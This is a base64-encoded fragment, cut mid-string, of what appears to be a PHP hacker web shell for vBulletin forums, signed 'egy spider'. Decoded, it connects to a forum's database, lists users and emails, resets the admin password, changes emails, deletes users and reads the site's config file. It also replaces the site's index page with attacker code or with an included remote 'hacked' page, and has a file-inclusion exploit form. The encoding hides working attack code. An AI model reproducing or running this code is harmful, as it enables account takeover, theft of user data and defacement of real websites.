J5KTsNCmlmICgkcmUpDQp7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9eWVsbG93PlRoZSBFLU1BSUwgb2YgdGhlIHVzZXIgPC9mb250Pjxmb250IGNvbG9yPXJlZD4nIC4gJHZidXNlciAuICc8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93PiB3YXMgY2hhbmdlZCB0byA8L2ZvbnQ+PGZvbnQgY29sb3I9cmVkPicgLiAkdmJtYWlsIC4gJzwvZm9udD48YnI+QmFjayB0byA8YSBocmVmPSI/Ij5TaGVsbDwvYT48L2ZvbnQ+JzsNCn0gZWxzZSB7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9cmVkPkZhaWxlZCB0byBjaGFuZ2UgRS1NQUlMPC9mb250PjwvZm9udD4nOw0KfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0icHN3IiAgJiYgaXNzZXQoJF9QT1NUWyd2YnVzZXInXSkgICYmIGlzc2V0KCRfUE9TVFsndmJwYXNzJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KJHZidXNlciA9ICRfUE9TVFsndmJ1c2VyJ107DQokdmJwYXNzID0gJF9QT1NUWyd2YnBhc3MnXTsNCm15c3FsX2Nvbm5lY3QoJGhvc3QsJHVzZXIsJHBhc3MpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggdXNlcjwvZm9udD4nKTsNCm15c3FsX3NlbGVjdF9kYigkZGIpIG9yIGRpZSgnPGZvbnQgY29sb3I9cmVkPk5vcGUsPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz5ObyBjT25uZWN0aW9uIHdpdGggREI8L2ZvbnQ+Jyk7DQppZiAoJHBhc3MgPT0gJycpDQp7DQokbnBhc3MgPSAnTlVMTCc7DQp9IGVsc2Ugew0KJG5wYXNzID0gJHBhc3M7DQp9DQplY2hvJzxmb250IHNpemU9Mz5Zb3UgYXJlIGNvbm5lY3RlZCB3aXRoIHRoZSBteXNxbCBzZXJ2ZXIgb2YgPGZvbnQgY29sb3I9eWVsbG93PicgLiAkaG9zdCAuICc8L2ZvbnQ+IGJ5IHVzZXIgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICR1c2VyIC4gJzwvZm9udD4gLCBwYXNzIDogPGZvbnQgY29sb3I9eWVsbG93PicgLiAkbnBhc3MgLiAnPC9mb250PiBhbmQgc2VsZWN0ZWQgREIgd2l0aCB0aGUgbmFtZSA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRkYiAuICc8L2ZvbnQ+PC9mb250Pic7DQo/Pg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPD8NCiRxdWVyeSA9ICdzZWxlY3QgKiBmcm9tIHVzZXIgd2hlcmUgdXNlcm5hbWU9IicgLiAkdmJ1c2VyIC4gJyI7JzsNCiRyZXN1bHQgPSBteXNxbF9xdWVyeSgkcXVlcnkpOw0Kd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcmVzdWx0KSkNCnsNCiRzYWx0ID0gJHJvd1snc2FsdCddOw0KJHggPSBtZDUoJHZicGFzcyk7DQokeCA9JHggLiAkc2FsdDsNCiRwYXNzX3NhbHQgPSBtZDUoJHgpOw0KJHF1ZXJ5ID0gJ3VwZGF0ZSB1c2VyIHNldCBwYXNzd29yZD0iJyAuICRwYXNzX3NhbHQgLiAnIiB3aGVyZSB1c2VybmFtZT0iJyAuICR2YnVzZXIgLiAnIjsnOw0KJHJlID0gbXlzcWxfcXVlcnkoJHF1ZXJ5KTsNCmlmICgkcmUpDQp7DQplY2hvICc8Zm9udCBzaXplPTM+PGZvbnQgY29sb3I9eWVsbG93PlRoZSBwYXNzIG9mIHRoZSB1c2VyIDwvZm9udD48Zm9udCBjb2xvcj1yZWQ+JyAuICR2YnVzZXIgLiAnPC9mb250Pjxmb250IGNvbG9yPXllbGxvdz4gd2FzIGNoYW5nZWQgdG8gPC9mb250Pjxmb250IGNvbG9yPXJlZD4nIC4gJHZicGFzcyAuICc8L2ZvbnQ+PGJyPkJhY2sgdG8gPGEgaHJlZj0iPyI+U2hlbGw8L2E+PC9mb250Pic7DQp9IGVsc2Ugew0KZWNobyAnPGZvbnQgc2l6ZT0zPjxmb250IGNvbG9yPXJlZD5GYWlsZWQgdG8gY2hhbmdlIFBhc3NXb3JkPC9mb250PjwvZm9udD4nOw0KfQ0KfQ0KfQ0KaWYoaXNzZXQoJF9QT1NUWydob3N0J10pICYmIGlzc2V0KCRfUE9TVFsndXNlciddKSAmJiBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkgJiYgaXNzZXQoJF9QT1NUWydkYiddKSAmJiAkYWN0PT0ibG9naW4iKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9cHN3IiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIFVzZXIgUGFzc3dvcmQ6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNoYW5nZSIgdmFsdWU9IkNoYW5nZSIgLz48L3RoPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InZidXNlciIgdmFsdWU9ImFkbWluIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJ2YnBhc3MiIHZhbHVlPSJlZ3kgc3BpZGVyIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjxmb3JtIG5hbWU9ImNoYW5nZXBhc3MiIGFjdGlvbj0iP2FjdD1tYWlsIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIFVzZXIgRS1NQUlMOjo6Ojo8L3RoPjx0aD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJDaGFuZ2UiIHZhbHVlPSJDaGFuZ2UiIC8+PC90aD4NCjx0cj48dGQ+VXNlciA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJ2YnVzZXIiIHZhbHVlPSJhZG1pbiIgLz48L3RkPjwvdHI+DQo8dHI+PHRkPk1BSUwgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0idmJtYWlsIiB2YWx1ZT0iZWd5X3NwaWRlckBob3RtYWlsLmNvbSIgLz48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPD8NCmVjaG8nPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iaG9zdCIgdmFsdWU9IicgLiAkaG9zdCAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiIHZhbHVlPSInIC4gJHVzZXIgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzIiB2YWx1ZT0iJyAuICRwYXNzIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZGIiIHZhbHVlPSInIC4gJGRiIC4gJyI+JzsNCj8+DQo8L2Zvcm0+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9ZGVsIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6RGVsZXRlIGEgdXNlcjo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPlVzZXIgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0idmJ1c2VyIiB2YWx1ZT0iYWRtaW4iIC8+PC90ZD48L3RyPg0KPC90YWJsZT4NCjw/DQplY2hvJzxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Imhvc3QiIHZhbHVlPSInIC4gJGhvc3QgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJ1c2VyIiB2YWx1ZT0iJyAuICR1c2VyIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGFzcyIgdmFsdWU9IicgLiAkcGFzcyAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImRiIiB2YWx1ZT0iJyAuICRkYiAuICciPic7DQo/Pg0KPC9mb3JtPg0KPGhyIGNvbG9yPSIjMDBGRjAwIiAvPg0KPGZvcm0gbmFtZT0iY2hhbmdlcGFzcyIgYWN0aW9uPSI/YWN0PWluYyIgbWV0aG9kPSJwb3N0Ij4NCjx0YWJsZSBib3JkZXI9IjEiIGJnY29sb3I9IiMwMDAwMDAiIGJvcmRlcmNvbG9yPSJsaW1lIg0KYm9yZGVyY29sb3JkYXJrPSJsaW1lIiBib3JkZXJjb2xvcmxpZ2h0PSJsaW1lIj4NCjx0aD46Ojo6OkNoYW5nZSBJbmRleCBieSBJbmNsdXNpb24oTm90IFBMKEVnWSBTcElkRXIpKTo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPkluZGV4IExpbmsgOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0ibGluayIgdmFsdWU9Imh0dHA6Ly93d3cuZWd5c3BpZGVyLmV1L2hhY2tlZC5odG1sIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjxociBjb2xvcj0iIzAwRkYwMCIgLz4NCjxmb3JtIG5hbWU9ImNoYW5nZXBhc3MiIGFjdGlvbj0iP2FjdD1jb2RlIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q2hhbmdlIEluZGV4IGJ5IENvZGUoQWxsIEVkaXRpb24pOjo6Ojo8L3RoPjx0aD48aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJDaGFuZ2UiIHZhbHVlPSJDaGFuZ2UiIC8+PC90aD4NCjx0cj48dGQ+SW5kZXggQ29kZSA6IDwvdGQ+PHRkPjx0ZXh0YXJlYSBuYW1lPSJjb2RlIiBjb2xzPTYwIHJvd3M9MjA+PC90ZXh0YXJlYT48L3RkPjwvdHI+DQo8L3RhYmxlPg0KPD8NCmVjaG8nPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iaG9zdCIgdmFsdWU9IicgLiAkaG9zdCAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InVzZXIiIHZhbHVlPSInIC4gJHVzZXIgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJwYXNzIiB2YWx1ZT0iJyAuICRwYXNzIC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZGIiIHZhbHVlPSInIC4gJGRiIC4gJyI+JzsNCj8+DQo8L2Zvcm0+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Zm9ybSBuYW1lPSJjaGFuZ2VwYXNzIiBhY3Rpb249Ij9hY3Q9c2hlbGwiIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpJbmplY3QgRmlsZUluY2x1c2lvbiBFeHBsb2l0KE5PVCBQTChBTC1NQVNTWUEpKTo6Ojo6PC90aD48dGg+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iQ2hhbmdlIiB2YWx1ZT0iQ2hhbmdlIiAvPjwvdGg+DQo8dHI+PHRkPlZhcmlhYmxlIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InZhciIgdmFsdWU9InNoZWxsIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8Pw0KZWNobyc8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJob3N0IiB2YWx1ZT0iJyAuICRob3N0IC4gJyI+PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0idXNlciIgdmFsdWU9IicgLiAkdXNlciAuICciPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhc3MiIHZhbHVlPSInIC4gJHBhc3MgLiAnIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkYiIgdmFsdWU9IicgLiAkZGIgLiAnIj4nOw0KPz4NCjwvZm9ybT4NCjw/DQp9DQppZiAoJGFjdCA9PSAnJyl7DQo/Pg0KPGZvcm0gbmFtZT0ibXlmb3JtIiBhY3Rpb249Ij9hY3Q9bG9naW4iIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpEQVRBQkFTRSBDT05GSUc6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJDb25uZWN0IiAvPjwvdGg+PHRyPjx0ZD5Ib3N0IDogPC90ZD48dGQ+PGlucHV0IG5hbWU9Imhvc3QiIHZhbHVlPSJsb2NhbGhvc3QiIC8+PC90ZD48L3RyPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InVzZXIiIHZhbHVlPSJyb290IiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJwYXNzIiB2YWx1ZT0iIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+TmFtZSA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJkYiIgdmFsdWU9InZiIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2Zvcm0+DQoNCjw/DQp9DQppZiAoJGFjdCA9PSAnbHN0JyAmJiBpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pICYmIGlzc2V0KCRfUE9TVFsnaG9zdCddKSAmJiBpc3NldCgkX1BPU1RbJ2RiJ10pKQ0Kew0KJGhvc3QgPSAkX1BPU1RbJ2hvc3QnXTsNCiR1c2VyID0gJF9QT1NUWyd1c2VyJ107DQokcGFzcyA9ICRfUE9TVFsncGFzcyddOw0KJGRiID0gJF9QT1NUWydkYiddOw0KbXlzcWxfY29ubmVjdCgkaG9zdCwkdXNlciwkcGFzcykgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCB1c2VyPC9mb250PicpOw0KbXlzcWxfc2VsZWN0X2RiKCRkYikgb3IgZGllKCc8Zm9udCBjb2xvcj1yZWQ+Tm9wZSw8L2ZvbnQ+PGZvbnQgY29sb3I9eWVsbG93Pk5vIGNPbm5lY3Rpb24gd2l0aCBEQjwvZm9udD4nKTsNCmlmICgkcGFzcyA9PSAnJykNCnsNCiRucGFzcyA9ICdOVUxMJzsNCn0gZWxzZSB7DQokbnBhc3MgPSAkcGFzczsNCn0NCmVjaG8nPGZvbnQgc2l6ZT0zPllvdSBhcmUgY29ubmVjdGVkIHdpdGggdGhlIG15c3FsIHNlcnZlciBvZiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRob3N0IC4gJzwvZm9udD4gYnkgdXNlciA6IDxmb250IGNvbG9yPXllbGxvdz4nIC4gJHVzZXIgLiAnPC9mb250PiAsIHBhc3MgOiA8Zm9udCBjb2xvcj15ZWxsb3c+JyAuICRucGFzcyAuICc8L2ZvbnQ+IGFuZCBzZWxlY3RlZCBEQiB3aXRoIHRoZSBuYW1lIDxmb250IGNvbG9yPXllbGxvdz4nIC4gJGRiIC4gJzwvZm9udD48L2ZvbnQ+JzsNCj8+DQo8aHIgY29sb3I9IiMwMEZGMDAiIC8+DQo8Pw0KJHJlID0gbXlzcWxfcXVlcnkoJ3NlbGVjdCAqIGZyb20gdXNlcicpOw0KZWNobyc8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+PHRoPklEPC90aD48dGg+VVNFUk5BTUU8L3RoPjx0aD5FTUFJTDwvdGg+JzsNCndoaWxlICgkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlKSkNCnsNCmVjaG8nPHRyPjx0ZD4nIC4gJHJvd1sndXNlcmlkJ10gLiAnPC90ZD48dGQ+JyAuICRyb3dbJ3VzZXJuYW1lJ10gLiAnPC90ZD48dGQ+JyAuICRyb3dbJ2VtYWlsJ10gLiAnPC90ZD48L3RyPic7DQp9DQplY2hvJzwvdGFibGU+JzsNCj8+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+PHRoPjw/DQokY291bnQgPSBteXNxbF9udW1fcm93cygkcmUpOw0KZWNobyAnTnVtYmVyIG9mIHVzZXJzIHJlZ2lzdGVyZWQgaXMgOiBbICcgLiAkY291bnQgLiAnIF0nOw0KID8+PC90aD48L3RhYmxlPg0KPD8NCn0NCmlmICgkYWN0ID09ICd1c2Vycycpew0KPz4NCiA8Zm9ybSBuYW1lPSJteWZvcm0iIGFjdGlvbj0iP2FjdD1sc3QiIG1ldGhvZD0icG9zdCI+DQo8dGFibGUgYm9yZGVyPSIxIiBiZ2NvbG9yPSIjMDAwMDAwIiBib3JkZXJjb2xvcj0ibGltZSINCmJvcmRlcmNvbG9yZGFyaz0ibGltZSIgYm9yZGVyY29sb3JsaWdodD0ibGltZSI+DQo8dGg+Ojo6OjpEQVRBQkFTRSBDT05GSUc6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJDb25uZWN0IiAvPjwvdGg+PHRyPjx0ZD5Ib3N0IDogPC90ZD48dGQ+PGlucHV0IG5hbWU9Imhvc3QiIHZhbHVlPSJsb2NhbGhvc3QiIC8+PC90ZD48L3RyPg0KPHRyPjx0ZD5Vc2VyIDogPC90ZD48dGQ+PGlucHV0IG5hbWU9InVzZXIiIHZhbHVlPSJyb290IiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+UGFzcyA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJwYXNzIiB2YWx1ZT0iIiAvPjwvdGQ+PC90cj4NCjx0cj48dGQ+TmFtZSA6IDwvdGQ+PHRkPjxpbnB1dCBuYW1lPSJkYiIgdmFsdWU9InZiIiAvPjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8L2Zvcm0+DQo8Pw0KfQ0KaWYgKCRhY3Q9PSdjb25maWcnKQ0Kew0KPz4NCjxmb3JtIG5hbWU9Im15Zm9ybSIgYWN0aW9uPSI/YWN0PXJlY29uZmlnIiBtZXRob2Q9InBvc3QiPg0KPHRhYmxlIGJvcmRlcj0iMSIgYmdjb2xvcj0iIzAwMDAwMCIgYm9yZGVyY29sb3I9ImxpbWUiDQpib3JkZXJjb2xvcmRhcms9ImxpbWUiIGJvcmRlcmNvbG9ybGlnaHQ9ImxpbWUiPg0KPHRoPjo6Ojo6Q09ORklHIFBBVEg6Ojo6OjwvdGg+PHRoPjxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IkNvbm5lY3QiIHZhbHVlPSJSZWFkIiAvPjwvdGg+DQo8dHI+PHRkPlBBVEggOiA8L3RkPjx0ZD48aW5wdXQgbmFtZT0icGF0aCIgdmFsdWU9Ii9ob21lL2hhY2tlZC9wdWJsaWNfaHRtbC92Yi9pbmNsdWRlcy9jb25maWcucGhwIiAvPjwvdGQ+PC90cj48L3RhYmxlPjwvZm9ybT4NCjw/DQp9DQppZiAoJGFjdD09J2luZGV4JykNCnsNCi8vIEluZGV4IEVkaXRvcjxIVE1MIEVkaXRvcj4NCj8+DQo8c2NyaXB0IGxhbmd1YWdlPSdqYXZhc2NyaXB0Jz4NCmZ1bmN0aW9uIGxpbmsoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlclRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCnZhciB5ID0gcHJvbXB0KCJFbnRlcmxpbmsiLCIiKQ0KaWYgKHk9PSIiIHwgeT09bnVsbCApIHsNCnJldHVybjsNCn0NCg0KaW5kZXhmb3JtLmluZGV4LnZhbHVlPWluZGV4Zm9ybS5pbmRleC52YWx1ZSArICI8YSBocmVmPSIgKyB5ICsiPiIrWCsiPC9hPiI7DQoNCn0NCg0KZnVuY3Rpb24gcmlnaHQoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlciBUZXh0IiwiIikNCmlmIChYPT0iIiB8IFg9PW51bGwgKSB7DQpyZXR1cm47DQp9DQppbmRleGZvcm0uaW5kZXgudmFsdWU9aW5kZXhmb3JtLmluZGV4LnZhbHVlICsgIjxwIGFsaWduPSdyaWdodCc+IitYKyI8L3A+IjsNCg0KfQ0KZnVuY3Rpb24gbGVmdCgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPHAgYWxpZ249J2xlZnQnPiIrWCsiPC9wPiI7DQoNCn0NCmZ1bmN0aW9uIGNlbnRlcigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGNlbnRlcj4iK1grIjwvY2VudGVyPiI7DQoNCn0NCmZ1bmN0aW9uIGNvbG91cigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyVGV4dCIsIiIpDQppZiAoWD09IiIgfCBYPT1udWxsICkgew0KcmV0dXJuOw0KfQ0KdmFyIHkgPSBwcm9tcHQoIkVudGVyQ29sb3VyIiwiIikNCmlmICh5PT0iIiB8IHk9PW51bGwgKSB7DQpyZXR1cm47DQp9DQoNCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPGZvbnQgY29sb3I9IiArIHkgKyI+IitYKyI8L2ZvbnQ+IjsNCg0KfQ0KZnVuY3Rpb24gYigpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPEI+IitYKyI8L0I+IjsNCg0KfQ0KZnVuY3Rpb24gdSgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPFU+IitYKyI8L1U+IjsNCg0KfQ0KZnVuY3Rpb24gaSgpew0KdmFyIFggPSBwcm9tcHQoIkVudGVyIFRleHQiLCIiKQ0KaWYgKFg9PSIiIHwgWD09bnVsbCApIHsNCnJldHVybjsNCn0NCmluZGV4Zm9ybS5pbmRleC52YWx1ZT1pbmRleGZvcm0uaW5kZXgudmFsdWUgKyAiPEk+IitYKyI8L0k+IjsNCg0KfQ0KZnVuY3Rpb24gbWFyKCl7DQp2YXIgWCA9IHByb21wdCgiRW50ZXIgVGV4dCIsIiIpDQppZiAoWD09IiIgfCBYPT1udWxsICkgew0KcmV0dXJuOw0KfQ0KaW5kZXhmb3JtLmluZGV4LnZhbHVlPWluZGV4Zm9ybS5pbmRleC52YWx1ZSArICI8bWFycXVlZT4iK1grIjwvbWFycXVlZT4iOw0KDQp9DQpmdW5jdGlvbiBpbWcoKXsNCnZhciBYID0gcHJvbXB0KCJFbnRlciBsaW5rIiwiIikNCmlmIChYPT0iIiB8IFg9PW51bGwgKSB7DQpyZXR1cm47DQp9DQppbmRleGZvcm0uaW5kZXgudmFsdWU9aW5kZXhmb3JtLmluZGV4LnZhbHVlIC